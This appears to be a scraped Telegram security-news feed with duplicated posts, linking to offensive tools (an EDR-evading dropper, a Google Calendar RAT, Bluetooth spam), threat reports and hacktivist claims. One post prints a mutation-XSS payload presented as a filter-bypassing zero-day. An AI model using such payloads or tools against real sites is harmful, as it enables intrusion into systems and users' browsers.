Mozilla: Say (an encrypted) hello to a more private internet.
https://blog.mozilla.org/en/products/firefox/encrypted-hello/
https://blog.mozilla.org/en/products/firefox/encrypted-hello/
The Mozilla Blog
Related Articles
As web users, what we say and do online is subject to pervasive surveillance. Although we typically associate online tracking with ad networks and other th
โ Thought of sharing: There are high changes that I will reject a candidate in an interview, if they are a bug-bounty hunter.
Following are some reasons for most and not all the hunters.
1. They are technically not sound. They only have limited information about the bug they identified or they usually identify like web based attacks or sometimes mobile apps.
2. They are mostly check-lists and tool reliant people.
3. They know very few bugs and start spraying on multiple targets. They are nuclei attackers (maybe this is a right term to have them associated).
4. They omit hard bugs almost always. They go for easy rewarding bugs. And not for zero-days or tricky RCEs.
5. Most hunters cannot perform a pentest. Since they're good (not in depth though) in specific bug or set of bugs.
6. Most of them are not researchers (as they are often called). They do not have patents, CVEs or published researches.
On the other hand, some top CTF players are excellent. And those who perform research are good for the job.
In an interview, I ask candidate what vulnerability class or type they are comfortable. They choose the easiest like IDOR or XSS or even SQLi. And are almost always web based attacks.
And then I ask them to tell me what mutation or universal XSS is. They be; we know reflected and stored and a bit about DOM (since they automate DOM).
For SQLi, 90% rely upon SQL-Map. The remaining use single quote combos ๐
If this skillset is at my gate. I'll choose to outsource through hacker-one; since they have bounty hunters.
I would need something more professional in the organisation to find issues. Because our goal is not to protect against nuclei templates but APT groups' that are nation-state.
Following are some reasons for most and not all the hunters.
1. They are technically not sound. They only have limited information about the bug they identified or they usually identify like web based attacks or sometimes mobile apps.
2. They are mostly check-lists and tool reliant people.
3. They know very few bugs and start spraying on multiple targets. They are nuclei attackers (maybe this is a right term to have them associated).
4. They omit hard bugs almost always. They go for easy rewarding bugs. And not for zero-days or tricky RCEs.
5. Most hunters cannot perform a pentest. Since they're good (not in depth though) in specific bug or set of bugs.
6. Most of them are not researchers (as they are often called). They do not have patents, CVEs or published researches.
On the other hand, some top CTF players are excellent. And those who perform research are good for the job.
In an interview, I ask candidate what vulnerability class or type they are comfortable. They choose the easiest like IDOR or XSS or even SQLi. And are almost always web based attacks.
And then I ask them to tell me what mutation or universal XSS is. They be; we know reflected and stored and a bit about DOM (since they automate DOM).
For SQLi, 90% rely upon SQL-Map. The remaining use single quote combos ๐
If this skillset is at my gate. I'll choose to outsource through hacker-one; since they have bounty hunters.
I would need something more professional in the organisation to find issues. Because our goal is not to protect against nuclei templates but APT groups' that are nation-state.
Cordyceps: C++ self-Injecting dropper based on various EDR evasion techniques.
This project consists of a simple C++ self-Injecting dropper focused on EDR evasion. To implement it, I have combined the use of Windows Thread Pooling to hide the call stack and the use of indirect syscalls to avoid hooking in the NTDLL.
https://github.com/pard0p/Cordyceps
This project consists of a simple C++ self-Injecting dropper focused on EDR evasion. To implement it, I have combined the use of Windows Thread Pooling to hide the call stack and the use of indirect syscalls to avoid hooking in the NTDLL.
https://github.com/pard0p/Cordyceps
Spam iOS, Android and Windows with Bluetooth pairing messages using Flipper Zero or Android smartphone.
https://www.mobile-hacker.com/2023/10/17/spam-ios-android-and-windows-with-bluetooth-pairing-messages-using-flipper-zero-or-android-smartphone/
https://www.mobile-hacker.com/2023/10/17/spam-ios-android-and-windows-with-bluetooth-pairing-messages-using-flipper-zero-or-android-smartphone/
Mobile Hacker
Spam iOS, Android and Windows with Bluetooth pairing messages using Flipper Zero or Android smartphone Mobile Hacker
So far, it was possible to spam through proximity paring messages only iOS devices, either using Flipper Zero, Arduino board or any Android as explained in my previous blog here. However, recently developers of Xtreme firmware for Flipper Zero pushed andโฆ
DARPA worried battlefield mixed reality vulnerable to 'cognitive attacks'.
Hacks, physical tricks could turn headsets into vomit extractors, but tests already show no ops needed for that.
https://www.theregister.com/2023/10/12/darpa_worried_battlefield_mixed_reality/
Hacks, physical tricks could turn headsets into vomit extractors, but tests already show no ops needed for that.
https://www.theregister.com/2023/10/12/darpa_worried_battlefield_mixed_reality/
The Register
DARPA worried battlefield mixed reality vulnerable to 'cognitive attacks'
Hacks, physical tricks could turn headsets into vomit extractors, but tests already show no ops needed for that
GAP by x.com/xnl_h4ck3r
A BurpSuite extension that can help you bruteforce and enumerate undiscovered parameters!
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing.
https://github.com/xnl-h4ck3r/GAP-Burp-Extension
A BurpSuite extension that can help you bruteforce and enumerate undiscovered parameters!
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing.
https://github.com/xnl-h4ck3r/GAP-Burp-Extension
A backdoor is implanted on Cisco devices by exploiting a pair of zero-day flaws in IOS XE software that has been modified by the threat actor so as to escape visibility via previous fingerprinting methods.
The attacks entail fashioning CVE-2023-20198 (CVSS score: 10.0) and CVE-2023-20273 (CVSS score: 7.2) into an exploit chain that grants the threat actor the ability to gain access to the devices, create a privileged account, and ultimately deploy a Lua-based implant on the devices.
https://thehackernews.com/2023/10/backdoor-implant-on-hacked-cisco.html
The attacks entail fashioning CVE-2023-20198 (CVSS score: 10.0) and CVE-2023-20273 (CVSS score: 7.2) into an exploit chain that grants the threat actor the ability to gain access to the devices, create a privileged account, and ultimately deploy a Lua-based implant on the devices.
https://thehackernews.com/2023/10/backdoor-implant-on-hacked-cisco.html
The outstanding stealth of Operation Triangulation.
https://securelist.com/triangulation-validators-modules/110847/
https://securelist.com/triangulation-validators-modules/110847/
Securelist
Triangulation: validators, post-compromise activity and modules
In this report Kaspersky shares insights into the validation components used in Operation Triangulation, TriangleDB implant post-compromise activity, as well as details of some additional modules.
cKure Red
โ Pwn2Own Toronto [Day 1] https://youtu.be/pcLkJ5YsA8w [Day 2] https://youtu.be/xc1yERrNMjA
โ Hackers earn over $1 million for 58 zero-days at PwnยฒOwn Toronto.
https://youtu.be/E6bGDScaz78
https://www.zerodayinitiative.com/blog/2023/10/23/pwn2own-toronto-2023-the-schedule
https://www.youtube.com/live/Tm8-syB79FQ
https://www.bleepingcomputer.com/news/security/hackers-earn-over-1-million-for-58-zero-days-at-pwn2own-toronto/
https://youtu.be/E6bGDScaz78
https://www.zerodayinitiative.com/blog/2023/10/23/pwn2own-toronto-2023-the-schedule
https://www.youtube.com/live/Tm8-syB79FQ
https://www.bleepingcomputer.com/news/security/hackers-earn-over-1-million-for-58-zero-days-at-pwn2own-toronto/
YouTube
Wrapping Up Day Three of Pwn2Own Toronto 2023
#pwn2own #0day #zerodayinitiative
We've now completed three days of Pwn2Own Toronto 2023, and each day brings even more explosive research. We finish the day with a contest total of $938,250 awarded, and with four more attempts tomorrow, that million-dollarโฆ
We've now completed three days of Pwn2Own Toronto 2023, and each day brings even more explosive research. We finish the day with a contest total of $938,250 awarded, and with four more attempts tomorrow, that million-dollarโฆ
Media is too big
VIEW IN TELEGRAM
Israel-Palestine Cyber-War update!
๐ฎ๐ท๐ฎ๐ฑ The Iranian hacker group "Moses Staff" has released a video in which they demonstrated the hacking of surveillance cameras positioned above the Mossad headquarters and the 8200 Unit of Aman (Israeli electronic intelligence unit) headquarters.
The message from the Iranian hackers states: "We have been instructed to remain silent, but we are prepared and armed. We await orders from our leader. "
๐ฎ๐ท๐ฎ๐ฑ The Iranian hacker group "Moses Staff" has released a video in which they demonstrated the hacking of surveillance cameras positioned above the Mossad headquarters and the 8200 Unit of Aman (Israeli electronic intelligence unit) headquarters.
The message from the Iranian hackers states: "
Media is too big
VIEW IN TELEGRAM
Cyber-Attack amid Israel-Palestine Cyber-War: Iranian state sponsored (as per Israeli sources) threat actor has allegedly compromised a data center pertaining to Israel with over 30TB of Data being wiped off in the attack.
The video was shared by the threat actor with technical detail.
Furthermore, a message was shared alongside the video PoC;
Thenceforth,you will suffer irreparable damage,We will punish you...
Also we destroyed more than 30 TB of data from different servers
ืืขืชื ืชืกืืื ื ืืงืื ืืืชื ืืคืื
ืื ืื ื ื ืขื ืืฉ ืืชืื
ืืืชืงืคื ืื ืืจืกื ื ืืืชืจ ื-30 ืืจื ืืืื ืฉื ื ืชืื ืื ืืฉืจืชืื ืฉืื ืื
The video was shared by the threat actor with technical detail.
Thenceforth,you will suffer irreparable damage,We will punish you...
Also we destroyed more than 30 TB of data from different servers
ืืขืชื ืชืกืืื ื ืืงืื ืืืชื ืืคืื
ืื ืื ื ื ืขื ืืฉ ืืชืื
ืืืชืงืคื ืื ืืจืกื ื ืืืชืจ ื-30 ืืจื ืืืื ืฉื ื ืชืื ืื ืืฉืจืชืื ืฉืื ืื
Media is too big
VIEW IN TELEGRAM
โ Reattaching video due to format issues (apparently).
Cyber-Attack apparently deciphered.
Kazakhstan-associated YoroTrooper disguises the origin of attacks as Azerbaijan.
https://blog.talosintelligence.com/attributing-yorotrooper/
Kazakhstan-associated YoroTrooper disguises the origin of attacks as Azerbaijan.
https://blog.talosintelligence.com/attributing-yorotrooper/
Cisco Talos
Kazakhstan-associated YoroTrooper disguises origin of attacks as Azerbaijan
Cisco Talos assesses with high confidence that YoroTrooper, an espionage-focused threat actor first active in June 2022, likely consists of individuals from Kazakhstan based on their use of Kazakh currency and fluency in Kazakh and Russian.
Hacking Some More Secure USB Flash Drives (Part I).
https://blog.syss.com/posts/hacking-usb-flash-drives-part-1/
https://blog.syss.com/posts/hacking-usb-flash-drives-part-1/
SySS Tech Blog
Hacking Some More Secure USB Flash Drives (Part I)
During a research project in the beginning of 2022, SySS IT security expert Matthias Deeg found several security vulnerabilities in different tested USB flash drives with AES hardware encryption.
Raspberry Pi RP2040 Superior Boy Takes Cybersecurity on the Go.
https://www.hackster.io/superior-tech/advanced-cyber-security-and-education-device-superior-boy-133905
https://www.tomshardware.com/news/raspberry-pi-rp2040-superior-boy-takes-cybersecurity-on-the-go
https://www.hackster.io/superior-tech/advanced-cyber-security-and-education-device-superior-boy-133905
https://www.tomshardware.com/news/raspberry-pi-rp2040-superior-boy-takes-cybersecurity-on-the-go
Hackster.io
Advanced Cyber Security and Education Device - SUPERIOR BOY
Superior Boy is Cybersecurity, education, and research in one advanced device. Everything a mobile cybersecurity pro needs.
GCR - Google Calendar RAT
Google Calendar RAT is a PoC of Command&Control (C2) over Google Calendar Events, This tool has been developed for those circumstances where it is difficult to create an entire red teaming infrastructure. To use GRC, only a Gmail account is required. The script creates a 'Covert Channel' by exploiting the event descriptions in Google Calendar. The target will connect directly to Google." It could be considered as a layer 7 application Covert Channel (but some friends would say it cannot be :) very thanks to my mates "Tortellini" https://aptw.tf)
https://github.com/MrSaighnal/GCR-Google-Calendar-RAT
Google Calendar RAT is a PoC of Command&Control (C2) over Google Calendar Events, This tool has been developed for those circumstances where it is difficult to create an entire red teaming infrastructure. To use GRC, only a Gmail account is required. The script creates a 'Covert Channel' by exploiting the event descriptions in Google Calendar. The target will connect directly to Google." It could be considered as a layer 7 application Covert Channel (but some friends would say it cannot be :) very thanks to my mates "Tortellini" https://aptw.tf)
https://github.com/MrSaighnal/GCR-Google-Calendar-RAT
Zero-Day: Universal MXSS.
Works in all browsers and is likely to bypass lots of filters because title is both an SVG and HTML tag. Briefly checked DOM Purify and it looked okay.
Works in all browsers and is likely to bypass lots of filters because title is both an SVG and HTML tag. Briefly checked DOM Purify and it looked okay.
<svg>
<title>
<title>
<image href="</title><iframe onload=alert(1)>">
</title>
</title>
</svg>This media is not supported in your browser
VIEW IN TELEGRAM
Anonymous (Hacktivist group) sends a message to the Israeli leader and government amid ongoing attack on children of Palestine.
Story; part of Israel-Palestine Cyber-War.
https://youtu.be/BGcHzs9LKQE
Story; part of Israel-Palestine Cyber-War.
https://youtu.be/BGcHzs9LKQE